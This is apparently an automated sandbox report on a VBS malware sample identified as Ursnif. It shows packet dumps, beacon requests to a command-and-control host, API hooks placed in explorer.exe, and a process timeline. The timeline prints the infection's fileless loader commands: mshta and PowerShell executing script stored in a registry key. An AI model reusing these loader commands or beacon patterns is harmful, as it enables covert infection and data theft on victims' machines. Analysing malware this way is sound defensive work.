                                                                                                                                                    Data Raw: 17 45 7e 72 ac 5b ed 66 e1 de 31 9e 70 18 b7 1a 77 c0 be b3 e2 43 ff 7c d8 16 7f 6f 35 a2 d1 a5 d2 ec 0d 0c de 58 84 1a f3 53 04 f0 65 cb 76 1f 35 85 a0 7d 1d f2 44 63 de 89 f3 f1 eb d3 60 21 68 3d 3a 93 e1 55 94 db 4c d2 f2 b4 3e 34 48 eb e8 47 7b 53 14 54 86 87 a3 d2 0d 55 0c d0 4f 6f 51 73 eb e2 f9 f4 9b f0 49 af 3d a0 bd ba 48 52 29 a2 84 33 75 9e 48 16 a7 b3 00 58 91 bf bf ea 49 85 ff c7 58 36 df 5b 13 ec c2 c6 92 56 72 82 53 68 a1 ca a8 33 3e e7 8b 8e 6f fa 4b 85 a0 7f bb 5c de 12 c3 97 40 27 18 f2 b2 95 91 d8 b7 45 cf 2a 5f 95 76 5b fc 02 c1 9d d7 e5 7f ee ec f5 a0 52 7b 4d 4d ae da 70 b4 71 95 b6 39 2e 38 47 c0 ab 5e fe cf a1 6a 5c a5 3c 8f 1b 97 0a 2a 41 5f 6e 2e 85 b4 8e 24 d6 6a 1c cb 43 8c ca 75 7d 09 57 73 3c a2 b8 0b 18 00 21 c1 f5 fc e4 2b 04 14 51 c3 36 ea 80 55 0a 28 82 e4 56 51 91 99 bf 11 ae 36 06 cd 81 44 e0 ad db 69 d6 8e 24 28 ee 4c 0d 81 69 8b 96 c0 52 cd ed ec 31 e8 7f 08 d8 ff 0a 82 4d 1d fa a0 28 3c 3f 5f 53 cb 64 ea 5d 7c c7 f0 0f 28 71 5a f4 60 b7 7b f3 e1 19 5b 7b be d1 62 af ef 2f ad 3b 22 a8 03 e7 9f 3d e5 da ca 8b 1a 9c 2c fd 76 89 a9 f7 a5 7b 6a b4 47 62 bf 64 5d 54 26 01 9a 1d 3b b0 97 db c5 c1 dd 94 52 d0 b2 77 e0 f7 00 8d c1 99 02 69 f4 b2 87 b2 0c 68 b3 9d b6 e6 a6 9f 58 b0 52 f8 5e b5 ac 1e 36 41 bd bc f9 5d 3a 2b 5a 40 60 9a 48 c1 b3 4a df cc 81 65 53 4e e4 9a 80 8b dd 8f 43 eb 11 23 73 1b 1b c1 99 89 21 94 4c a5 84 c3 13 96 ad 5d 82 20 a4 a4 3b dd 1e 43 74 c6 42 11 7a 8a f2 93 8b 7e 24 73 17 d9 c7 eb 47 18 47 41 4f a2 f1 bc 52 cc 35 f2 c2 73 3e e5 32 8a b5 c7 7c 3b d4 88 bd aa 47 48 66 2e 00 bd 3f fc 08 b4 49 98 e3 36 db f0 33 4c 40 2b cc 59 2a b5 ba 73 58 27 de a0 31 0e 6d 63 70 19 7b 5f 67 00 54 79 89 7f 42 21 df 6e 23 e1 54 43 4a 09 00 77 ac fb e4 2e a8 6d 07 21 b3 a0 98 ad 40 d2 34 64 c9 c2 62 14 7c 45 eb a0 65 98 c1 18 a1 6a af 69 0a a2 bb 50 42 96 c1 d7 02 58 6d f4 b1 15 90 f6 50 9c 6a fd d4 2e 5e a7 4a cb 67 59 63 74 77 99 de e0 c0 d5 5c 9d a7 89 1b 90 39 29 23 21 3b c4 35 f1 49 9e 67 f3 ce fe 1d 0a 67 69 06 13 13 30 ab e6 c6 f4 c9 7e 94 48 5b a1 f7 5f 27 1f 03 ac 85 e1 0e b1 bf 6e e1 1c 5a 24 cc b2 53 fd 61 58 e3 87 0b 85 9e 03 94 f6 2a bd 92 53 09 77 f8 5e d3 c9 b7 19 42 4e e6 2a 67 af 27 4e 01 de 6a fc 1e 82 0c 7e 45 7b e8 1d 97 82 9b 5c 14 96 d2 82 dd 53 15 1e 84 41 01 4f 0f 32 ac ee b7 85 96 4c e9 dc b0 42 3c 93 a6 0b a3 79 cb 7b 2c d1 21 6f c1 6a 38 48 d7 37 8f 35 b8 1d 7a e7 eb 63 bc 4e 6b b6 23 aa 9c fd 32 03 46 e2 37 47 49 c2 35 a1 48 7e 98 49 6a b4 98 e7 cb 33 dd 1a be 5a c8 ea a7 44 33 9b e3 a6 84 da 68 ec bf 93 03 88 f9 6e 02 17 a6 96 46 ad ae 25 c2 bb 97 7a 57 35 aa 0a 42 b5 c3 8a 35 af 20 1b 1a b9 c6 99 99 8a b2 b6 46 1c 70 a0 53 c2 e9 a2 e6 ad a4 8f d5 11 da 74 60 13 7c 55 4d 42 1c c6 a4 47 a8 4e 27 67 a4 37 b3 0e ca f5 b1 9a a5 de e3 07 25 55 07 ff 18 b3 17 44 8b a0 af e3 f5 ff 75 b8 f2 2b 4d 9e f9 ad 07 c0 5e d7 1b ab 81 e4 99 93 ac a9 63 2f 4e 27 18 d0 dd 29 f7 28 98 b1 c3 5e 52 9e d4 01 1b 9f ba 6d 7d 24 b8 cc 84 0e 03 07 2e 3a ba b5 ad 8b ae 57 ce 78 7b aa 0f 07 5f ee 2a 4a 6b 0d f8 40 bb 79 91 71 5d ae 1b 1d 3c bf b9 e2 9b d4 4c 6c 52 55 e3 59 22 40 9a 6f cc 9a 14 bb 63 ad 00 8f bf cd 7b ca 18 ce c6 df 21 08 86 ed 93 17 79 b7 6d 89 0c ba 64 8a 93 dd fa 1b 07 69 84 31 87 f9 ae 59 a4 f8 ed 03 62 6f 2a fa 54 99 38 81 d4 e3 dc e8 39 d4 b0 62 81 c2 49 a1
                                                                                                                                                    Data Ascii: E~r[f1pwC|o5XSev5}Dc`!h=:UL>4HG{STUOoQsI=HR)3uHXIX6[VrSh3>oK\@'E*_v[R{MMpq9.8G^j\<*A_n.$jCu}Ws<!+Q6U(VQ6Di$(LiR1M(<?_Sd]|(qZ`{[{b/;"=,v{jGbd]T&;RwihXR^6A]:+Z@`HJeSNC#s!L] ;CtBz~$sGGAOR5s>2|;GHf.?I63L@+Y*sX'1mcp{_gTyB!n#TCJw.m!@4db|EejiPBXmPj.^JgYctw\9)#!;5Iggi0~H[_'nZ$SaX*Sw^BN*g'Nj~E{\SAO2LB<y{,!oj8H75zcNk#2F7GI5H~Ij3ZD3hnF%zW5B5 FpSt`|UMBGN'g7%UDu+M^c/N')(^Rm}$.:Wx{_*Jk@yq]<LlRUY"@oc{!ymdi1Ybo*T89bI
                                                                                                                                                    Nov 24, 2020 20:36:24.714710951 CET6441INData Raw: eb f5 88 ab ff 3f 0c 75 18 1b 1d 91 15 83 a6 fd 8b ee e5 bd 0f 48 82 1c 3d 58 61 f7 66 26 f2 73 9c 5e a2 cd 4a 40 a8 52 cb 15 b9 9e 3b df e8 48 53 c5 31 f7 99 29 1a aa 5a 45 ff 53 fe d6 ce f8 d1 52 76 db d2 1d 04 1c 72 03 24 24 ea d3 f6 ed 0b a8
                                                                                                                                                    Data Ascii: ?uH=Xaf&s^J@R;HS1)ZESRvr$$tfK[78IZJw5nJX($B~"2"LZ YVBR6e?]<3Cb RaG;d6{(1#SVJ8|ymf&ASxYE6*Vfy
                                                                                                                                                    Nov 24, 2020 20:36:24.714741945 CET6443INData Raw: 17 e6 e3 36 d0 98 48 92 d6 8c 71 5d 6d 0c b5 89 7b f0 f8 2b 38 6c 87 33 a0 26 18 6c 19 1f b4 dd 6d a8 59 82 27 0f f4 73 73 5a 2b f2 0d 90 05 8d a8 2e f6 c3 62 40 2a 1e 51 7b e4 87 c8 26 68 a9 73 36 f0 f9 2e 79 3b b2 24 df 00 53 a1 ef 92 9a 6c d1
                                                                                                                                                    Data Ascii: 6Hq]m{+8l3&lmY'ssZ+.b@*Q{&hs6.y;$SlTNI#1<:'vKS;<x{vYJ0y4oO6,)|S}P{ZL)%;eG`>yBTpCq`^7BW@O5Y-xkB6L=}
                                                                                                                                                    Nov 24, 2020 20:36:24.714771986 CET6444INData Raw: e3 dd 38 4b 8e 73 21 eb 8f 06 22 3f 26 6d fe dd 16 d9 84 d9 6d 75 bd aa 6a 7a c4 48 d5 a0 29 cf 64 c2 d0 8a e9 59 26 44 95 5e c8 f4 ee 3e 75 fa f2 90 83 4f b0 03 03 da 2b a5 bf 28 4d 6a 66 36 57 4e 20 38 25 31 09 83 27 80 93 bc 6d ab 43 d9 f3 23
                                                                                                                                                    Data Ascii: 8Ks!"?&mmujzH)dY&D^>uO+(Mjf6WN 8%1'mC#U(SLNqv#<[Nf@"Cs \<v=*e7>mh-k\=2@NCzQ"45_sqd,g}]XdQ4TG:`phV-:t=(
                                                                                                                                                    Nov 24, 2020 20:36:24.714801073 CET6446INData Raw: 96 b4 a8 52 0a 3c cc 5a a8 f6 3d 04 3b 66 9c 68 c0 67 fe ae 92 b8 bb a4 47 48 ec 76 69 69 fe ef 78 5d c3 36 e3 20 41 a3 97 30 c7 15 95 e7 56 6a 89 1f c9 09 d7 97 64 b5 c3 71 95 4b 7f 59 46 03 01 7a 66 6f ae 00 3b 4b e1 d6 3a 1b dd 21 33 78 24 d4
                                                                                                                                                    Data Ascii: R<Z=;fhgGHviix]6 A0VjdqKYFzfo;K:!3x$ [OVi<dnDPVv>?(UVnR)$K\,7/@sW+ue(EDe*[Mz{Uial'er^r
                                                                                                                                                    Nov 24, 2020 20:36:24.714829922 CET6447INData Raw: 8d ca df 11 4f fc 21 25 23 28 d3 8c 54 2b e3 24 ac d8 5f f6 d7 0b 62 74 a2 8c 3a 67 20 ba 28 47 5a 5a 33 e8 16 02 dc 03 3f 52 a8 c0 8d 10 e2 05 5b 66 18 c7 ed 24 1e 6b c5 34 e1 94 1d 95 1d b6 33 62 b1 4f 49 9e 51 82 f1 4f 44 09 41 39 a8 3b 77 63
                                                                                                                                                    Data Ascii: O!%#(T+$_bt:g (GZZ3?R[f$k43bOIQODA9;wcHSpd7cQ5@'UFi!S$Z&lcFa<(: #vP|@!cPkn6A{!dQ${Z+1Q&=HL:Ny21W
                                                                                                                                                    Nov 24, 2020 20:36:24.714859962 CET6448INData Raw: 09 2f f0 20 e4 26 5b cb d4 cc e5 52 cf db 61 6b 2d 47 ec 69 dd 5e 31 72 29 9d d5 ac fa 55 ae 1b 0d 3c dc 64 67 32 b2 a3 85 c1 e3 48 e0 86 49 8c 9b 60 74 e9 51 c1 19 c6 2b 6d f5 4a 64 2e 07 6a 5e 53 1f 1f 3b ed 0a 0b ce 79 2f 2f 0e 2d 7a c0 6e e1
                                                                                                                                                    Data Ascii: / &[Rak-Gi^1r)U<dg2HI`tQ+mJd.j^S;y//-zn5.XR+_6}p{U[%(:]'F9~1me$QaV$;@F/Bs7EO@m+hb0I2qWje6'
                                                                                                                                                    Nov 24, 2020 20:36:24.714899063 CET6450INData Raw: 7a a1 92 c2 66 9c fa 7f 43 4f 25 10 46 b1 e3 4e ee 61 73 a5 d5 db 2e dd 5d a0 6d f0 3a 12 00 0d a1 64 a0 22 6e ab 5f a2 db 1e f6 88 12 b9 8b 06 29 43 bf a4 21 7e ad 39 3f 44 c0 00 28 bf d4 9c bb 13 10 82 96 aa df 27 b6 2f a2 1d d4 73 54 39 ee 77
                                                                                                                                                    Data Ascii: zfCO%FNas.]m:d"n_)C!~9?D('/sT9wQ+V(FIA}DxQ8tl5m[Zo(82]UD0yoSv\:^E'f)kHuX#_.)Yg-FzNZVt?YI{sVL
                                                                                                                                                    Nov 24, 2020 20:36:24.714932919 CET6451INData Raw: 5e 50 5f 4c e5 c6 31 9a 88 82 ec 6c d8 60 3e fa 75 dd 91 ad 70 ca dc 5f 9b 60 14 dd a7 fe b2 d7 4f f1 c4 60 d2 be 52 f7 0a f8 06 bd 43 ac 27 32 e1 2a b7 25 05 15 9c d6 09 5b 54 6a ae d6 30 23 2a bc ef 40 c4 c3 4a d9 ed 04 7c 6f 42 02 12 cb 05 ed
                                                                                                                                                    Data Ascii: ^P_L1l`>up_`O`RC'2*%[Tj0#*@J|oB+%lZiA-)D}ubR$%5EgDI?'f*=^8[szVr4Y'/4+{D8y^)/}Faf%#Dcn~l;+XmjUgmF}xxKHt
                                                                                                                                                    Nov 24, 2020 20:36:24.714965105 CET6453INData Raw: 4e 72 9b e7 16 b5 db c8 44 a9 f7 b1 71 65 64 64 60 b1 da 0c 16 8f b8 53 d1 a2 07 c4 2c ce 07 d0 55 a2 ac 93 0a 01 aa a8 21 23 e3 97 b6 bf 91 60 da ad 15 09 b0 d1 eb 48 cd ad 94 47 28 8e bb 58 9a 48 f3 6e 83 e2 8d 01 e1 e8 5f d9 1f 69 c7 21 42 59
                                                                                                                                                    Data Ascii: NrDqedd`S,U!#`HG(XHn_i!BY"Rb#Y27)7P="wntU_ ?y]&L=g%Ax} Cr'nv|&g6wHLTk?N~d>,<AHkPyhv?R
                                                                                                                                                    Nov 24, 2020 20:36:24.987858057 CET6454INData Raw: 93 85 14 68 47 26 7c 67 39 3f 77 88 de d4 5c 18 30 d0 14 5e de 9a 6b e5 2c 48 b0 5e 3d e3 91 af 57 bc 3d 16 94 7d 2f 2b 88 f1 7d 3b eb e7 ad 0a 9a b3 3e 5a 07 af 45 8e 04 22 7d a2 2c 36 e1 36 62 6f d9 1c 0a bb 93 98 d7 d2 b7 80 73 e6 03 40 9d 41
                                                                                                                                                    Data Ascii: hG&|g9?w\0^k,H^=W=}/+};>ZE"},66bos@AP>}U$2JgNc0eWm|b^t]}_cI>RUM\B=6mLU#H_*tfx4l?cCFI="4<[@HErLp


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    6192.168.2.44977147.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 24, 2020 20:36:32.746280909 CET6585OUTGET /api1/k2_2BPSkEkmXT6PU/zDOxTRpC_2BY4wv/Uc9rQ_2BdQmALihj0b/O35yk81wO/_2BJJsGmcvqJn3WdvBLw/hcTBL2iarC4qZ4YV_2B/9d_2B7Ggs3BnAW23i_2Bde/t9JKt6KAZoSWe/re2dGR19/9ik0fbgVm0bNqFeU0yDPCsA/NCbWTLbFLW/YFtlZWtXaQQ7AvabV/oGahJymIxSEf/eCn4UPTT9W7/4TOvhUziJPirjd/aVzy6CqNvyNL3A4AuKPyc/d_2F7R5E_2FRLkVN/moL_2BcW_0A_0Dg/DfT_2BdqiAs0Ox1XHx/HnIUtWHt_/2F_2Bw1qPKdBjmoNms0Z/zZq7v HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
                                                                                                                                                    Host: api3.lepini.at
                                                                                                                                                    Nov 24, 2020 20:36:34.025243044 CET6585INHTTP/1.1 200 OK
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Tue, 24 Nov 2020 19:36:33 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    7192.168.2.44977247.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 24, 2020 20:36:34.349790096 CET6586OUTPOST /api1/ULQHRvwqRb/G8wDpH5qMRHl3_2B4/UEjMLLNvz2cZ/AqaL4_2BQcz/lKb4H9qP6o6VM4/FlSbx_2FrtqOlCmpoRQHO/gmwLzr_2B42eSyBR/YuYftTktOwyZz8p/hMg6srNEseymB6j4aM/TOURtgojN/ejIcLmrrpdo7g5MixpUk/u7YXv1vIle7x1I8w25J/iYIlQpBNQ_2F6_2F52tecp/haAs_2BPE0IZE/BFjaQwUV/3vmY6zByqYDob0bhn9M09Xl/4P5yimux7H/hMxuBTbr_0A_0DFL2/PNs4wicqd7PM/VagjrCBglgI/sb2CcVg_2F8b2O/GuU_2FGPPZ/e HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
                                                                                                                                                    Content-Length: 2
                                                                                                                                                    Host: api3.lepini.at
                                                                                                                                                    Nov 24, 2020 20:36:34.349812031 CET6586OUTData Raw: 0d 0a
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 24, 2020 20:36:35.467319012 CET6587INHTTP/1.1 200 OK
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Tue, 24 Nov 2020 19:36:35 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    Data Raw: 38 36 0d 0a 6d c1 7e 4a da 7a 5d ab 02 85 8e 5e 16 8a 9d 33 14 94 ff 3d ec 30 9b 8d e2 66 ac 28 02 43 65 9f 8d 11 85 83 37 ea 9a 97 d6 17 ef 6c f8 b8 30 c9 f6 98 89 be 44 d0 bf a1 2e e3 85 da 82 53 46 1f 85 20 ff 52 89 54 4d f4 c4 03 01 74 3a 34 be 58 6f 99 6b 77 8b 67 5a 04 29 6e e6 97 6d 23 a2 56 85 08 28 53 0f fc 3c 0a 3a 10 fb f7 8a 9a 96 b1 9b 3c d8 5c 3c ce 1f 05 2f 12 fc 7f ce 4e 58 07 c1 e2 4f 0d 41 72 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 86m~Jz]^3=0f(Ce7l0D.SF RTMt:4XokwgZ)nm#V(S<:<\</NXOAr0


                                                                                                                                                    Code Manipulations

                                                                                                                                                    User Modules

                                                                                                                                                    Hook Summary

                                                                                                                                                    Function NameHook TypeActive in Processes
                                                                                                                                                    api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIATexplorer.exe
                                                                                                                                                    api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIATexplorer.exe
                                                                                                                                                    CreateProcessAsUserWEATexplorer.exe
                                                                                                                                                    CreateProcessAsUserWINLINEexplorer.exe
                                                                                                                                                    CreateProcessWEATexplorer.exe
                                                                                                                                                    CreateProcessWINLINEexplorer.exe
                                                                                                                                                    CreateProcessAEATexplorer.exe
                                                                                                                                                    CreateProcessAINLINEexplorer.exe

                                                                                                                                                    Processes

                                                                                                                                                    Process: explorer.exe, Module: user32.dll
                                                                                                                                                    Function NameHook TypeNew Data
                                                                                                                                                    api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFABB035200
                                                                                                                                                    api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT4DA5020
                                                                                                                                                    Process: explorer.exe, Module: KERNEL32.DLL
                                                                                                                                                    Function NameHook TypeNew Data
                                                                                                                                                    CreateProcessAsUserWEAT7FFABB03521C
                                                                                                                                                    CreateProcessAsUserWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                                                                                                                    CreateProcessWEAT7FFABB035200
                                                                                                                                                    CreateProcessWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                                                                                                                    CreateProcessAEAT7FFABB03520E
                                                                                                                                                    CreateProcessAINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                                                                                                                    Process: explorer.exe, Module: WININET.dll
                                                                                                                                                    Function NameHook TypeNew Data
                                                                                                                                                    api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFABB035200
                                                                                                                                                    api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT4DA5020

                                                                                                                                                    Statistics

                                                                                                                                                    CPU Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Memory Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Start time:20:34:11
                                                                                                                                                    Start date:24/11/2020
                                                                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0xyZ4rY0opA2.vbs'
                                                                                                                                                    Imagebase:0x7ff779be0000
                                                                                                                                                    File size:163840 bytes
                                                                                                                                                    MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:20:34:39
                                                                                                                                                    Start date:24/11/2020
                                                                                                                                                    Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                    Imagebase:0x7ff660d70000
                                                                                                                                                    File size:823560 bytes
                                                                                                                                                    MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:20:34:40
                                                                                                                                                    Start date:24/11/2020
                                                                                                                                                    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6976 CREDAT:17410 /prefetch:2
                                                                                                                                                    Imagebase:0xe80000
                                                                                                                                                    File size:822536 bytes
                                                                                                                                                    MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:20:35:25
                                                                                                                                                    Start date:24/11/2020
                                                                                                                                                    Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                    Imagebase:0x7ff660d70000
                                                                                                                                                    File size:823560 bytes
                                                                                                                                                    MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:20:35:26
                                                                                                                                                    Start date:24/11/2020
                                                                                                                                                    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17410 /prefetch:2
                                                                                                                                                    Imagebase:0xe80000
                                                                                                                                                    File size:822536 bytes
                                                                                                                                                    MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:20:35:31
                                                                                                                                                    Start date:24/11/2020
                                                                                                                                                    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:82952 /prefetch:2
                                                                                                                                                    Imagebase:0xe80000
                                                                                                                                                    File size:822536 bytes
                                                                                                                                                    MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:20:35:41
                                                                                                                                                    Start date:24/11/2020
                                                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
                                                                                                                                                    Imagebase:0x7ff696f80000
                                                                                                                                                    File size:14848 bytes
                                                                                                                                                    MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    General

                                                                                                                                                    Start time:20:35:42
                                                                                                                                                    Start date:24/11/2020
                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
                                                                                                                                                    Imagebase:0x7ff7bedd0000
                                                                                                                                                    File size:447488 bytes
                                                                                                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:20:35:43
                                                                                                                                                    Start date:24/11/2020
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff724c50000
                                                                                                                                                    File size:625664 bytes
                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:20:35:49
                                                                                                                                                    Start date:24/11/2020
                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline'
                                                                                                                                                    Imagebase:0x7ff7286f0000
                                                                                                                                                    File size:2739304 bytes
                                                                                                                                                    MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    General

                                                                                                                                                    Start time:20:35:50
                                                                                                                                                    Start date:24/11/2020
                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD10C.tmp' 'c:\Users\user\AppData\Local\Temp\xuilsqrn\CSCD8A4030A3E546C3B2CF916F018EDC0.TMP'
                                                                                                                                                    Imagebase:0x7ff6390b0000
                                                                                                                                                    File size:47280 bytes
                                                                                                                                                    MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    General

                                                                                                                                                    Start time:20:35:53
                                                                                                                                                    Start date:24/11/2020
                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.cmdline'
                                                                                                                                                    Imagebase:0x7ff6ffe50000
                                                                                                                                                    File size:2739304 bytes
                                                                                                                                                    MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    General

                                                                                                                                                    Start time:20:35:54
                                                                                                                                                    Start date:24/11/2020
                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
